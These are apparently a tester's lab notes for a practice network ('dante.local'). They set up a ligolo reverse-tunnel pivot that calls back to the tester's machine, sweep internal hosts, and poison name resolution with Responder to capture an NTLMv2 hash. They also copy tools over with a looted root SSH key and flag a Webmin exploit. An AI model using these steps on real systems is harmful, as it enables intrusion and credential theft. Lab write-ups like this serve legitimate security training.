# Setup Pivot
- Set up `ligolo proxy` on Kali
```bash
sudo ./proxy -selfcert
```
![[images/Pasted image 20260617193849.png]]
- Set up the agent
```bash
./agent -connect 10.10.14.42:11601 -ignore-cert
```
![[images/Pasted image 20260617193710.png]]
- Add dummy IPv4 address for interface and confirm
```bash
sudo ip addr add 10.10.10.1/24 dev iface_name
ip a
ip route
```
![[images/Pasted image 20260617193837.png]]
# Ping Sweep
- `fping` ![[images/Pasted image 20260617193901.png]]
- confirm with for loop
```bash
for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done
```
![[images/Pasted image 20260617194134.png]]
- create `hosts.txt`
```bash
for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done | awk '{print $4}' | cut -d':' -f1 > hosts.txt
```
![[images/Pasted image 20260617194614.png]]
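An added example (not from the original notes) that generalises the sweep above: it pings the /24 in parallel with a timeout and extracts responding addresses by regex, so `hosts.txt` stays a clean IP list even when `ping` prints a resolved name (`64 bytes from dc01.dante.local (172.16.1.20): ...`), where the `awk '{print $4}'` pipeline would write the name instead. The sample ping output is constructed for the demonstration.

```bash
# Parse ping output on stdin and print each responding IPv4 once, in numeric order.
# Handles both "64 bytes from 172.16.1.5: ..." and "64 bytes from name (172.16.1.20): ...".
parse_ping_hosts() {
    sed -nE 's/^[0-9]+ bytes from ([^ ]+ \()?([0-9]{1,3}(\.[0-9]{1,3}){3})\)?:.*/\2/p' \
      | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n \
      | uniq
}

# Sweep a /24 in parallel (one probe, one-second timeout per host), then parse.
# Usage: ping_sweep 172.16.1 > hosts.txt
ping_sweep() {
    local prefix="$1"   # e.g. 172.16.1
    {
        for i in $(seq 1 254); do
            ping -c 1 -W 1 "$prefix.$i" 2>/dev/null &
        done
        wait   # keep the pipe open until every probe has answered or timed out
    } | parse_ping_hosts
}

# Constructed sample output: a duplicate reply, an unreachable line, a resolved name.
SAMPLE_PING_OUTPUT='64 bytes from 172.16.1.5: icmp_seq=1 ttl=128 time=0.52 ms
64 bytes from 172.16.1.5: icmp_seq=1 ttl=128 time=0.48 ms
From 172.16.1.1 icmp_seq=1 Destination Host Unreachable
64 bytes from dc01.dante.local (172.16.1.20): icmp_seq=1 ttl=128 time=0.61 ms
64 bytes from 172.16.1.101: icmp_seq=1 ttl=128 time=0.77 ms'

# Demonstrate the parser offline on the constructed sample.
printf '%s\n' "$SAMPLE_PING_OUTPUT" | parse_ping_hosts
```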
## Internal `nxc smb` scans
- Use current creds > nothing ![[images/Pasted image 20260617201006.png]]
- null and guest ![[images/Pasted image 20260617201041.png]]
# Start Responder
- Set up on the proper tunnel interface associated with the pivot ![[images/Pasted image 20260617203047.png]]
- not getting anything
- notice that `autoroute` only assigned an IPv6 address to the iface, so `responder` shows an IPv4 that is off ![[images/Pasted image 20260617210044.png]]![[images/Pasted image 20260617210049.png]]
- tear down the `ligolo` iface and tunnel and create our own w/o `autoroute`
```bash
sudo ip tuntap add user jacob mode tun ligolo
sudo ip link set ligolo up
sudo ./proxy -selfcert
./agent -connect 10.10.14.42:11601 -ignore-cert #target machine
sudo ip route add 172.16.1.0/24 dev ligolo
```
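An added preflight helper (not from the original notes) for the manual tun setup above: it creates the interface and route as in the commands, and refuses to continue unless the interface actually carries an IPv4 address, which is the condition `autoroute` left unmet and the reason `responder` reported a wrong IPv4. The interface name `ligolo`, the address `10.10.10.1/24` and the route `172.16.1.0/24` are taken from the notes; the sample `ip` output is constructed.

```bash
# Parse `ip -4 -o addr show dev <iface>` output on stdin; print the first IPv4 without prefix length.
ipv4_from_ip_output() {
    awk '$3 == "inet" { sub(/\/.*/, "", $4); print $4; exit }'
}

# Print the interface's IPv4 and return 0, or return 1 when it has none (IPv6-only counts as none).
iface_ipv4() {
    local addr
    addr=$(ip -4 -o addr show dev "$1" 2>/dev/null | ipv4_from_ip_output)
    [ -n "$addr" ] && printf '%s\n' "$addr"
}

# Create the tun by hand (no autoroute), assign an IPv4, add the route, then verify.
# Usage: preflight_tun ligolo 10.10.10.1/24 172.16.1.0/24
preflight_tun() {
    local iface="$1" addr="$2" route="$3"
    ip link show "$iface" >/dev/null 2>&1 || sudo ip tuntap add user "$USER" mode tun "$iface"
    sudo ip link set "$iface" up
    iface_ipv4 "$iface" >/dev/null || sudo ip addr add "$addr" dev "$iface"
    ip route show "$route" 2>/dev/null | grep -q "$iface" || sudo ip route add "$route" dev "$iface"
    iface_ipv4 "$iface" || { echo "no IPv4 on $iface: do not start a listener on it yet" >&2; return 1; }
}

# Constructed sample of `ip -4 -o addr show dev ligolo` on a correctly configured tun.
SAMPLE_IP_OUTPUT='5: ligolo    inet 10.10.10.1/24 scope global ligolo\       valid_lft forever preferred_lft forever'
printf '%s\n' "$SAMPLE_IP_OUTPUT" | ipv4_from_ip_output
```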
- try `responder` with `-wFv` poisoning mode
- add listeners within ligolo to forward traffic on ports 137 and 445 and set up `responder` on tun0 ![[images/Pasted image 20260618150736.png]]
- nothing
- try with chisel
- set up server ![[images/Pasted image 20260618151156.png]]
- set up client to forward traffic on ports 137 and 445 to localhost on Kali
- `glibc` incompatibility issues ![[images/Pasted image 20260618151206.png]]
- build a static version of `chisel` and move to target ![[images/Pasted image 20260618151615.png]]
- that works ![[images/Pasted image 20260618151625.png]]
- errors with `responder` because chisel has ports 137 and 445 tied up ![[images/Pasted image 20260618152231.png]]
- May be worthwhile to also set up on NIX01
- prepare a portable version of `responder` with wheel files ![[images/Pasted image 20260618152610.png]]
```bash
# Kali
git clone https://github.com/lgandx/Responder.git
cd Responder/
mkdir wheels
pip download --only-binary=:all: --platform manylinux2014_x86_64 --python-version 3.8 -r requirements.txt -d ./wheels
cd ..
zip -r responder_ubuntu20.zip Responder
scp -i ../loot/nix01.root.id_rsa responder_ubuntu20.zip root@<NIX01_IP>:/root   # <NIX01_IP>: placeholder for the NIX01 address
```
```bash
# target
unzip responder_ubuntu20.zip
cd Responder
sudo pip3 install --no-index --find-links=./wheels -r requirements.txt
```
- throwing an error ![[images/Pasted image 20260618153129.png]]
```bash
# Kali
pip download 'typing-extensions>=4.9' --python-version 3.8 --platform manylinux2014_x86_64 --only-binary=:all:   # quote the spec, otherwise the shell treats >= as a redirect
scp -i ../../../loot/nix01.root.id_rsa typing_extensions-4.13.2-py3-none-any.whl root@<NIX01_IP>:/root   # <NIX01_IP>: placeholder for the NIX01 address
# target
mv ../typing_extensions-4.13.2-py3-none-any.whl ./wheels/
sudo pip3 install --no-index --find-links=./wheels -r requirements.txt
```
- now we can run on NIX01 but we are running into conflicts on port 445 ![[images/Pasted image 20260618153545.png]]
- shut down the ligolo agent > we got an NTLMv2 hash! ![[images/Pasted image 20260618153709.png]]
- crack with
# Internal Nmap Scans
## 172.16.1.5 (DANTE-SQL01)
- light ![[images/Pasted image 20260617200504.png]]
- detailed ![[images/Pasted image 20260617200557.png]]
- FTP and NFS look tasty
- `flag.txt` in FTP
- grab flag with `nxc ftp` ![[images/Pasted image 20260617201912.png]]
- MSSQL on 1433 and 49673
- current creds don't work ![[images/Pasted image 20260617202118.png]]
- SMB
- guest and null don't work ![[images/Pasted image 20260617202221.png]]
## 172.16.1.12
- light ![[images/Pasted image 20260617200833.png]]
- detailed ![[images/Pasted image 20260617201208.png]]
- FTP, HTTP, HTTPS, MYSQL
- default XAMPP dashboards
## 172.16.1.19
- light ![[images/Pasted image 20260617201354.png]]
- detailed ![[images/Pasted image 20260617201444.png]]
- port 8080 has a jenkins server ![[images/Pasted image 20260618155147.png]]
## 172.16.1.20 (DANTE-DC01)
- light ![[images/Pasted image 20260617201628.png]]
- this is the DC
- detailed ![[images/Pasted image 20260617202319.png]]
- domain: `dante.local`
- forest: `dante.local`
- HTTP, HTTPS, SMB, RDP, WINRM
## 172.16.1.13 (DANTE-WS01)
- light ![[images/Pasted image 20260617202623.png]]
- detailed ![[images/Pasted image 20260617202927.png]]
- HTTP, HTTPS, SMB
- default XAMPP dashboards
## 172.16.1.101 (DANTE-WS02)
- light ![[images/Pasted image 20260617204356.png]]
- detailed
## 172.16.1.102 (DANTE-WS03)
- light ![[images/Pasted image 20260618202242.png]]
- detailed ![[images/Pasted image 20260618202916.png]]
## 172.16.1.10 (DANTE-NIX02)
- light ![[images/Pasted image 20260617210122.png]]
- detailed ![[images/Pasted image 20260617210227.png]]
- SSH, HTTP, SMB
## 172.16.1.17 (DANTE-NIX03)
- light ![[images/Pasted image 20260617210447.png]]
- detailed ![[images/Pasted image 20260617210727.png]]
- NOTE: very spicy goodies on ports 80 and 10000
- HTTP, SMB, WEBMIN, MYSQLX
- HTTP: 80 ![[images/Pasted image 20260618155734.png]]
- webmin ver. 1.900
- HTTP: 10000 ![[images/Pasted image 20260618155847.png]]
- [n0obit4/Webmin_1.890-POC (CVE-2019-15107 exploit)](https://github.com/n0obit4/Webmin_1.890-POC) includes some POCs